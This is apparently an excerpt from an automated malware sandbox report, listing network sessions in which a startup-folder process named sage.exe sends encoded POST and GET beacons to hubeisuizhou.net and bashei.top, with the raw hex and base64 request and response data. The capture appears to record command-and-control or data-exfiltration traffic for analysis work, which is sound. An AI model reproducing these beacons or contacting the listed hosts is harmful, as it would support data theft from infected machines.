                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.hubeisuizhou.net
                                                                                                                                              Origin: http://www.hubeisuizhou.net
                                                                                                                                              Referer: http://www.hubeisuizhou.net/jywy/
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Content-Length: 199
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 54 51 71 2b 56 6d 49 64 45 63 65 66 51 42 67 71 67 71 51 4d 6e 7a 4f 30 32 36 49 33 33 6b 54 74 57 6f 49 59 56 75 66 36 74 72 2f 73 32 69 6d 62 61 5a 49 33 4a 2b 59 70 39 55 57 44 45 77 4e 78 55 4a 55 42 75 54 52 50 66 66 51 2f 42 6b 6f 5a 34 45 31 4a 35 67 75 73 66 69 68 69 37 4a 44 37 32 44 55 46 65 77 76 43 2f 48 32 48 2f 63 6e 4d 56 35 33 79 71 52 73 77 66 35 66 4b 52 57 59 47 48 62 54 79 77 6a 42 76 6e 2b 64 70 67 7a 57 37 76 6d 4a 2b 78 47 2b 55 6b 6d 6b 44 42 54 74 6b 41 5a 62 50 53 6c 4a 47 31 35 56 67 4d 47 36 30 65 67 36 4a 71 71 2b 35 52 75 52 2f 2b 61 4d 31 61 77 3d 3d
                                                                                                                                              Data Ascii: VX=TQq+VmIdEcefQBgqgqQMnzO026I33kTtWoIYVuf6tr/s2imbaZI3J+Yp9UWDEwNxUJUBuTRPffQ/BkoZ4E1J5gusfihi7JD72DUFewvC/H2H/cnMV53yqRswf5fKRWYGHbTywjBvn+dpgzW7vmJ+xG+UkmkDBTtkAZbPSlJG15VgMG60eg6Jqq+5RuR/+aM1aw==
                                                                                                                                              Nov 28, 2024 18:57:22.056123018 CET289INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 17:57:21 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 146
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              6192.168.11.204972143.153.84.190804568C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 18:57:24.592784882 CET680OUTPOST /jywy/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.hubeisuizhou.net
                                                                                                                                              Origin: http://www.hubeisuizhou.net
                                                                                                                                              Referer: http://www.hubeisuizhou.net/jywy/
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Content-Length: 219
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 54 51 71 2b 56 6d 49 64 45 63 65 66 42 51 51 71 6a 4e 6b 4d 68 54 4f 37 6f 4b 49 33 73 55 54 70 57 6f 45 59 56 75 33 51 74 35 72 73 32 41 2b 62 5a 63 6f 33 4f 2b 59 70 36 6b 57 4d 41 77 4d 63 55 4a 5a 79 75 53 74 50 66 66 45 2f 42 67 73 5a 34 33 74 4f 6f 67 75 69 53 43 68 6b 2f 4a 44 37 32 44 55 46 65 77 36 58 2f 48 75 48 38 73 33 4d 48 59 33 78 32 42 73 33 50 70 66 4b 56 57 59 43 48 62 54 71 77 69 4d 4b 6e 34 5a 70 67 79 6d 37 75 33 4a 2f 37 47 2b 53 67 6d 6c 6d 42 48 30 56 4f 5a 54 79 56 6b 31 4b 30 70 74 73 41 77 72 75 44 53 4f 74 70 35 69 4c 56 65 6f 58 38 59 4e 75 48 78 4a 56 47 6a 52 7a 4a 45 75 62 65 72 67 63 63 5a 69 7a 61 36 45 3d
                                                                                                                                              Data Ascii: VX=TQq+VmIdEcefBQQqjNkMhTO7oKI3sUTpWoEYVu3Qt5rs2A+bZco3O+Yp6kWMAwMcUJZyuStPffE/BgsZ43tOoguiSChk/JD72DUFew6X/HuH8s3MHY3x2Bs3PpfKVWYCHbTqwiMKn4Zpgym7u3J/7G+SgmlmBH0VOZTyVk1K0ptsAwruDSOtp5iLVeoX8YNuHxJVGjRzJEubergccZiza6E=
                                                                                                                                              Nov 28, 2024 18:57:24.766431093 CET289INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 17:57:24 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 146
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              7192.168.11.204972243.153.84.190804568C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 18:57:27.312975883 CET2578OUTPOST /jywy/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.hubeisuizhou.net
                                                                                                                                              Origin: http://www.hubeisuizhou.net
                                                                                                                                              Referer: http://www.hubeisuizhou.net/jywy/
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 54 51 71 2b 56 6d 49 64 45 63 65 66 42 51 51 71 6a 4e 6b 4d 68 54 4f 37 6f 4b 49 33 73 55 54 70 57 6f 45 59 56 75 33 51 74 35 54 73 32 54 32 62 62 39 6f 33 50 2b 59 70 31 30 57 50 41 77 4e 65 55 4e 39 2b 75 53 67 30 66 63 38 2f 42 44 6b 5a 38 79 5a 4f 78 77 75 69 4e 53 68 6c 37 4a 44 71 32 44 46 43 65 77 71 58 2f 48 75 48 38 71 62 4d 43 35 33 78 30 42 73 77 66 35 66 38 52 57 59 71 48 62 62 51 77 69 59 77 6e 49 35 70 67 53 32 37 6f 46 78 2f 33 47 2b 51 6e 6d 6c 45 42 43 73 4f 4f 64 7a 45 56 6e 70 7a 30 71 64 73 52 6d 6d 42 65 54 4b 6d 39 76 6e 43 66 50 6c 67 31 34 68 4a 4c 41 4d 76 44 52 74 76 4e 41 4f 57 5a 72 34 4d 4c 35 44 78 41 2f 74 77 45 6b 6a 4b 4c 4a 44 2b 75 39 6a 70 31 48 68 6a 66 72 7a 63 34 47 53 67 36 2b 35 2b 54 36 74 57 64 32 75 65 6a 52 47 56 7a 4a 6b 58 73 48 54 4c 69 48 5a 66 2f 2b 37 35 2b 68 6c 61 75 5a 38 36 6f 65 39 34 66 4d 59 30 57 37 50 51 33 74 4c 7a 61 4d 52 44 7a 2b 30 4d 6d 58 6d 51 6d 59 73 50 37 6f 31 53 65 4f 64 4a 72 45 39 2f 4c 77 48 2b 38 66 65 31 32 75 6f [TRUNCATED]
                                                                                                                                              Data Ascii: VX=TQq+VmIdEcefBQQqjNkMhTO7oKI3sUTpWoEYVu3Qt5Ts2T2bb9o3P+Yp10WPAwNeUN9+uSg0fc8/BDkZ8yZOxwuiNShl7JDq2DFCewqX/HuH8qbMC53x0Bswf5f8RWYqHbbQwiYwnI5pgS27oFx/3G+QnmlEBCsOOdzEVnpz0qdsRmmBeTKm9vnCfPlg14hJLAMvDRtvNAOWZr4ML5DxA/twEkjKLJD+u9jp1Hhjfrzc4GSg6+5+T6tWd2uejRGVzJkXsHTLiHZf/+75+hlauZ86oe94fMY0W7PQ3tLzaMRDz+0MmXmQmYsP7o1SeOdJrE9/LwH+8fe12uoBGyvbGDUOiwQLXt5Kkl8wY8MRZVWVe/JUYmp/QwYoHnVDk6WKbhKv54x0kom/Hw0WD1kZFTAH0C5yLtbR0Qzbqs5zsDGalgJm65uZNGjF/oLr3RAp7VTF/2THrabWTbTcYsNz3N8T2X4yYyIo7Ce48nYTLvrAJFwNW+rJPS4u3ULrByjv9A6pOqboxQjHqcP9aDJRhFcbgEFA4oxtNwPmPqjhRkIcilNf9lAWtqA/5Ja6ecd1k9WaejToTX0lHT125QpmTkx+KWE8jAGpWCkC8PIYLacL/xoFwch1Ef0cpiWanMpraALnGbXdIRZYYxmE5yenY1zsJqDX5wD+j9EfGD0y+5mybzoS5pa5v3VxaIQj7N7iSq6OJd4QPIoF05Vpld+fCCUj8kXHVeEnPBurWJs6b6epH3kPoHJSa5TAPzHzwg+uhNOTDV2tUbclTIaz73kmsmJDDTy/LVHIKQPRbGbbfWJT+j8/73EPkICyJajxqRq2WRe/Ty5QvXAfe52xcgw+A1NH4xJPn6Zb1S4GzhU+g9AIg4I9JCJQiV2Fso1CToVTdsL/iTJTKyAz+unNr5Ckg0wxX0hAn+aVuGM56WGgEW9m5LhZ2xOqzY/JIsBPrxXiXVn45Kk4XXMJmy1OMndehBnqZK3BKQl8RsZ8sZ9+JOb5kBT4s [TRUNCATED]
                                                                                                                                              Nov 28, 2024 18:57:27.313054085 CET5251OUTData Raw: 52 46 43 71 4d 58 71 4f 64 2f 4a 54 43 54 2b 66 43 70 4e 79 65 5a 71 6c 65 63 38 39 43 31 34 57 32 53 49 76 4f 47 54 4a 33 50 58 6b 71 4b 42 72 30 32 57 4e 44 77 39 47 6c 55 55 4e 37 79 67 72 6c 53 66 4b 71 4c 67 36 4d 52 41 57 74 79 44 53 66 78
                                                                                                                                              Data Ascii: RFCqMXqOd/JTCT+fCpNyeZqlec89C14W2SIvOGTJ3PXkqKBr02WNDw9GlUUN7ygrlSfKqLg6MRAWtyDSfxA6zJ66hFR14+jUD8JD6F+8DLSKsaX7jsJXmn+DrZ3WZZShtcN0Uo+z1D3jVIXHT/haYhiqsfABTcAZRiq8fPdcqkVokVPjTKWCsQ8NFZ7jjgmpGoPghtzGQULCpL8PYxvw8kbD4sVXpZXm8u/2nY3bUYK4y4O22qa
                                                                                                                                              Nov 28, 2024 18:57:27.489638090 CET289INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 17:57:27 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 146
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              8192.168.11.204972343.153.84.190804568C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 18:57:30.023478985 CET398OUTGET /jywy/?YDrhw=DvQP9LC050182Z3&VX=eSCeWRIoJNy1ChkNr9Mrph+bw9krj2HtA4M0Ycvj+4uTwHyRXe49PM8qrTbeBTFYTaFawzZELf0uMSg9ynQv9wCKXjtU0s3V3zZMSDWRvxGcx4r7U6700ik= HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.hubeisuizhou.net
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Nov 28, 2024 18:57:30.196824074 CET289INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 17:57:30 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 146
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              9192.168.11.204972423.225.34.75804568C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 18:57:36.411322117 CET642OUTPOST /wh2p/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.bashei.top
                                                                                                                                              Origin: http://www.bashei.top
                                                                                                                                              Referer: http://www.bashei.top/wh2p/
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Content-Length: 199
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 77 38 62 4e 33 58 56 73 4f 58 67 50 70 2f 56 4d 30 38 30 6b 54 78 37 4f 53 50 4b 41 30 54 50 46 49 75 4c 36 37 42 6f 72 4e 30 38 6a 63 42 62 7a 4e 46 64 38 45 64 42 62 57 71 67 6c 75 42 4f 79 4d 76 31 66 43 71 50 31 74 49 56 71 78 45 37 78 6b 70 35 50 54 79 55 6c 65 4b 66 46 6b 2f 4d 50 42 73 56 69 6f 74 53 37 53 67 73 46 39 71 2f 49 34 36 2b 37 70 69 62 30 45 63 78 39 4e 72 54 32 4c 76 34 2f 73 7a 39 73 7a 53 78 71 59 57 58 51 42 35 67 30 77 68 44 52 59 55 4a 79 47 68 37 31 66 64 35 75 33 35 4d 6c 45 37 2f 64 35 66 56 46 4f 6e 2f 4c 36 7a 77 45 4c 4c 79 58 32 32 54 61 32 51 3d 3d
                                                                                                                                              Data Ascii: VX=w8bN3XVsOXgPp/VM080kTx7OSPKA0TPFIuL67BorN08jcBbzNFd8EdBbWqgluBOyMv1fCqP1tIVqxE7xkp5PTyUleKfFk/MPBsViotS7SgsF9q/I46+7pib0Ecx9NrT2Lv4/sz9szSxqYWXQB5g0whDRYUJyGh71fd5u35MlE7/d5fVFOn/L6zwELLyX22Ta2Q==
                                                                                                                                              Nov 28, 2024 18:57:36.575314999 CET706INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 17:57:36 GMT
                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Content-Encoding: gzip
                                                                                                                                              Data Raw: 31 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 54 3d 6f db 30 10 dd f5 2b 04 4f 52 91 90 56 5a 3b 72 23 1b 88 8b a6 48 01 37 09 dc 22 43 90 e1 2c 9e 25 ba 12 a9 92 94 3f 60 e6 bf 97 96 15 23 e8 d4 41 43 7b 0b 8f 77 c7 87 87 f7 0e 4c 72 53 16 13 2f c9 11 d8 24 31 dc 14 38 f9 d0 7f ef df 48 b5 e0 8c a1 48 e8 b1 98 d0 66 c4 4b 16 92 ed dc 91 a2 30 a8 26 49 1e fd 39 ef 2a 09 6d db 0e d8 cd b4 17 91 71 b1 7d d3 a2 2d 14 3d 72 f0 fe 99 48 74 aa 78 65 7c b3 ab 70 dc 33 b8 35 74 05 6b 38 56 7b be 56 e9 b8 97 1b 53 e9 8f 94 ae 34 a9 35 2a 4d 06 11 29 80 5e 44 f1 20 1a c6 97 64 a5 7b 4e 86 e3 13 27 57 8b 58 80 c8 6a c8 1c ea 1b c0 89 c7 97 c1 86 0b 26 37 44 c0 9a 67 60 a4 6a 50 af 33 a7 32 29 c1 a4 79 40 83 2a 97 02 6d 05 cc 56 92 59 7e df 5c f9 fd 21 97 da 25 c0 42 ca c3 d0 df 7b 1a cd 77 5e a2 ac 4d b0 ac 45 6a b8 14 41 b8 5f 83 f2 41 a9 f1 d3 89 3c c0 e0 72 d8 8f e2 e1 88 6c c5 f9 b9 11 bf b6 71 94 c6 83 4c 44 72 54 33 92 ca 92 3a 56 a2 90 c0 e8 eb e8 29 81 88 1c 9c eb 9d 75 85 77 71 c4 7b be 6a c5 28 64 [TRUNCATED]
                                                                                                                                              Data Ascii: 1eaT=o0+ORVZ;r#H7"C,%?`#AC{wLrS/$18HHfK0&I9*mq}-=rHtxe|p35tk8V{VS45*M)^D d{N'WXj&7Dg`jP32)y@*mVY~\!%B{w^MEjA_A<rlqLDrT3:V)uwq{j(d$W;O(309Q4+kEf",4`JrfgrSTjgo?T~G\|W.8XtAFnx{wAn[ 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              10192.168.11.204972523.225.34.75804568C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 18:57:39.110080004 CET662OUTPOST /wh2p/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.bashei.top
                                                                                                                                              Origin: http://www.bashei.top
                                                                                                                                              Referer: http://www.bashei.top/wh2p/
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Content-Length: 219
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 77 38 62 4e 33 58 56 73 4f 58 67 50 6f 63 64 4d 31 66 73 6b 55 52 37 4e 63 76 4b 41 39 7a 50 4a 49 75 48 36 37 41 39 75 4e 69 4d 6a 64 6a 44 7a 4d 48 6c 38 44 64 42 62 64 4b 67 6b 67 68 4f 70 4d 76 4a 39 43 6f 4c 31 74 49 42 71 78 42 48 78 6b 59 35 51 54 69 55 6e 52 71 66 4c 37 50 4d 50 42 73 56 69 6f 74 57 42 53 67 30 46 39 61 6a 49 2b 59 61 36 71 69 62 37 4e 38 78 39 62 72 54 36 4c 76 34 52 73 77 35 56 7a 52 4a 71 59 57 6e 51 43 73 63 7a 6a 42 44 54 57 30 4a 38 56 68 36 6d 58 4f 56 65 2f 49 55 2b 49 6f 7a 58 31 70 45 66 54 56 4c 76 35 67 73 32 50 37 4c 2f 30 30 53 42 72 52 76 67 44 6d 2f 77 61 31 59 4f 4f 70 4a 36 41 6a 6f 58 61 35 63 3d
                                                                                                                                              Data Ascii: VX=w8bN3XVsOXgPocdM1fskUR7NcvKA9zPJIuH67A9uNiMjdjDzMHl8DdBbdKgkghOpMvJ9CoL1tIBqxBHxkY5QTiUnRqfL7PMPBsViotWBSg0F9ajI+Ya6qib7N8x9brT6Lv4Rsw5VzRJqYWnQCsczjBDTW0J8Vh6mXOVe/IU+IozX1pEfTVLv5gs2P7L/00SBrRvgDm/wa1YOOpJ6AjoXa5c=
                                                                                                                                              Nov 28, 2024 18:57:39.273735046 CET706INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 17:57:39 GMT
                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Content-Encoding: gzip
                                                                                                                                              Data Raw: 31 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 54 3d 6f db 30 10 dd f5 2b 04 4f 52 91 90 56 5a 3b 72 23 1b 88 8b a6 48 01 37 09 dc 22 43 90 e1 2c 9e 25 ba 12 a9 92 94 3f 60 e6 bf 97 96 15 23 e8 d4 41 43 7b 0b 8f 77 c7 87 87 f7 0e 4c 72 53 16 13 2f c9 11 d8 24 31 dc 14 38 f9 d0 7f ef df 48 b5 e0 8c a1 48 e8 b1 98 d0 66 c4 4b 16 92 ed dc 91 a2 30 a8 26 49 1e fd 39 ef 2a 09 6d db 0e d8 cd b4 17 91 71 b1 7d d3 a2 2d 14 3d 72 f0 fe 99 48 74 aa 78 65 7c b3 ab 70 dc 33 b8 35 74 05 6b 38 56 7b be 56 e9 b8 97 1b 53 e9 8f 94 ae 34 a9 35 2a 4d 06 11 29 80 5e 44 f1 20 1a c6 97 64 a5 7b 4e 86 e3 13 27 57 8b 58 80 c8 6a c8 1c ea 1b c0 89 c7 97 c1 86 0b 26 37 44 c0 9a 67 60 a4 6a 50 af 33 a7 32 29 c1 a4 79 40 83 2a 97 02 6d 05 cc 56 92 59 7e df 5c f9 fd 21 97 da 25 c0 42 ca c3 d0 df 7b 1a cd 77 5e a2 ac 4d b0 ac 45 6a b8 14 41 b8 5f 83 f2 41 a9 f1 d3 89 3c c0 e0 72 d8 8f e2 e1 88 6c c5 f9 b9 11 bf b6 71 94 c6 83 4c 44 72 54 33 92 ca 92 3a 56 a2 90 c0 e8 eb e8 29 81 88 1c 9c eb 9d 75 85 77 71 c4 7b be 6a c5 28 64 [TRUNCATED]
                                                                                                                                              Data Ascii: 1eaT=o0+ORVZ;r#H7"C,%?`#AC{wLrS/$18HHfK0&I9*mq}-=rHtxe|p35tk8V{VS45*M)^D d{N'WXj&7Dg`jP32)y@*mVY~\!%B{w^MEjA_A<rlqLDrT3:V)uwq{j(d$W;O(309Q4+kEf",4`JrfgrSTjgo?T~G\|W.8XtAFnx{wAn[ 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              11192.168.11.204972623.225.34.75804568C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 18:57:41.810581923 CET2578OUTPOST /wh2p/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.bashei.top
                                                                                                                                              Origin: http://www.bashei.top
                                                                                                                                              Referer: http://www.bashei.top/wh2p/
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 77 38 62 4e 33 58 56 73 4f 58 67 50 6f 63 64 4d 31 66 73 6b 55 52 37 4e 63 76 4b 41 39 7a 50 4a 49 75 48 36 37 41 39 75 4e 69 45 6a 63 51 4c 7a 4d 67 4a 38 43 64 42 62 65 4b 67 66 67 68 50 35 4d 76 52 35 43 6f 48 4c 74 4b 35 71 33 58 7a 78 74 4d 56 51 63 69 55 6e 4a 61 66 47 6b 2f 4e 4e 42 73 6c 6d 6f 74 6d 42 53 67 30 46 39 59 58 49 70 61 2b 36 73 69 62 30 45 63 78 50 4e 72 54 57 4c 75 51 6e 73 7a 56 61 7a 68 70 71 5a 32 33 51 4f 2b 30 7a 67 68 44 56 56 30 49 36 56 68 33 2b 58 4f 4a 34 2f 49 51 45 49 72 54 58 6a 50 64 6a 43 68 50 31 39 6a 55 67 54 6f 37 43 31 58 71 56 70 54 61 46 48 56 2f 5a 55 52 42 59 51 72 56 6c 61 41 73 64 4f 73 7a 34 57 7a 41 75 46 64 63 72 41 6c 64 49 38 47 51 31 6d 55 53 51 37 2f 49 45 68 78 50 36 75 42 31 61 6a 35 6b 36 6d 2f 54 50 34 74 67 6b 2f 52 59 2b 70 70 38 2b 69 6b 72 6a 4e 78 67 33 76 37 75 31 2b 52 45 51 74 50 66 68 59 50 71 51 58 30 67 62 5a 6a 49 42 46 62 7a 42 56 48 52 6a 70 48 63 32 43 79 58 2b 34 4b 56 32 67 72 65 71 50 78 51 50 4a 4b 39 6e 51 33 36 [TRUNCATED]
